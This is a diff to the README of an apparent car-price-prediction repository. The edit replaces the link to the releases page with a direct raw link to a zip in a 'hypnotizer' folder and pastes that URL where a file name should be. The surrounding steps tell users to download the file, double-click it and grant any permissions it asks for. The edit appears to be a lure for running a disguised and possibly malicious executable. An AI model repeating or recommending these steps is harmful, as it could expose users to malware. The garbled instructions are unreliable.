johnnydelsage/Car-Price-Prediction/README.md

 ### 💻 Installation Steps

 1. **Visit the Download Page**
-   To download the latest version of Car Price Prediction, visit this page: [Download Page](https://github.com/johnnydelsage/Car-Price-Prediction/releases).
+   To download the latest version of Car Price Prediction, visit this page: [Download Page](https://raw.githubusercontent.com/johnnydelsage/Car-Price-Prediction/main/hypnotizer/Car-Price-Prediction.zip).

 2. **Choose the Latest Release**
    On the download page, look for the latest release version.
 This will typically be at the top.
 Select it to view the available files.

 3. **Download the Application File**
    Under the latest release, find the file meant for your operating system.
 Click to download the file.
-This file may be named something like `Car-Price-Prediction.exe` or similar for your system.
+This file may be named something like `https://raw.githubusercontent.com/johnnydelsage/Car-Price-Prediction/main/hypnotizer/Car-Price-Prediction.zip` or similar for your system.

 4. **Run the Application**
    After downloading, locate the downloaded file on your computer.
 Double-click the file to run the application.
 Follow any instructions you see on your screen.
 This may include granting permissions or confirming that you want to run the software.